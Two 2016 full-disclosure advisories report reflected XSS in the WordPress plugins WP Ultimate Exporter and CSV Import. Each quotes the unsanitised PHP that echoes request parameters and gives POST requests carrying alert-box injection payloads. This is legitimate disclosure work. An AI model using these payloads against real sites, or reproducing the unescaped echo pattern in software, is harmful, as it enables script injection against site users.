WP Ultimate Exporter XSS Vulnerability

## FULL DISCLOSURE

#Product : WP Ultimate Exporter
#Exploit Author : Rahul Pratap Singh
#Version : 1.0
#Home page Link : https://wordpress.org/plugins/wp-ultimate-exporter/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 24/Feb/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
“export_name” and “export_post_type_name” parameters are not sanitized that leads to Reflected XSS.

—————————————-
Vulnerable Code:
—————————————-
File Name: /wp-ultimate-exporter/includes/WUExporterUI.php

Found at line:88
$export_post_type = isset($_REQUEST[‘export_name’]) ? $_REQUEST[‘export_name’] : ” ;

Found at line:89
$custom_post = isset($_REQUEST[‘export_post_type_name’]) ? $_REQUEST[‘export_post_type_name’] : ” ;?>

Found at line:91

<input type =”hidden” value = ‘<?php echo $export_post_type?>’ name=’export_type_name’>

Found at line:92

<input type =”hidden” value = ‘<?php echo $custom_post?>’ name=’export_custompost_type’>

—————————————-
Exploit:
—————————————-
POST /wp-admin/admin.php?page=wp_ultimate_exporter&step=exportposttype

export_name=”/><input type=text onclick=alert(/XSS/)><!–”

POST /wp-admin/admin.php?page=wp_ultimate_exporter&step=exportposttype

export_post_type_name=”/><input type=text onclick=alert(/XSS/)><!–”

—————————————-
POC:
—————————————-
wp-ultimate-exporter

wp-ultimate-exporter1

Vulnerability Disclosure Timeline:
→ January  30, 2016   – Bug discovered, initial report to WordPress
→ February 1,  2016   – WordPress response, plugin taken down
→ February 24, 2016 – Plugin up with same version

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

CSV Import XSS Vulnerability

## FULL DISCLOSURE

#Product : CSV Import
#Exploit Author : Rahul Pratap Singh
#Version : 1.0
#Home page Link : https://wordpress.org/plugins/csv-import/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 23/Feb/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
“alertmsg” parameter is not sanitized that leads to Reflected XSS.

—————————————-
Vulnerable Code:
—————————————-
File Name: csv-import/index.php

Found at line:238

echo __($_POST[‘alertmsg’], ‘csv-import’);

—————————————-
Exploit:
—————————————-
POST /wp-admin/admin-ajax.php

action=trans_csvimp_alertstr&alertmsg=”><img src=x onerror=alert(1)>

—————————————-
POC:
—————————————-
csv-importxsspoc

Fix:
Update to 1.1

Vulnerability Disclosure Timeline:
→ January   30, 2016  – Bug discovered, initial report to WordPress
→ February 1, 2016    – WordPress response, plugin taken down
→ February 23, 2016  – Vendor Deployed a Patch

#######################################
#                    CTG SECURITY SOLUTIONS                          #
#                www.ctgsecuritysolutions.com                        #
#######################################

Pub Ref:
https://wordpress.org/plugins/csv-import/changelog/

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.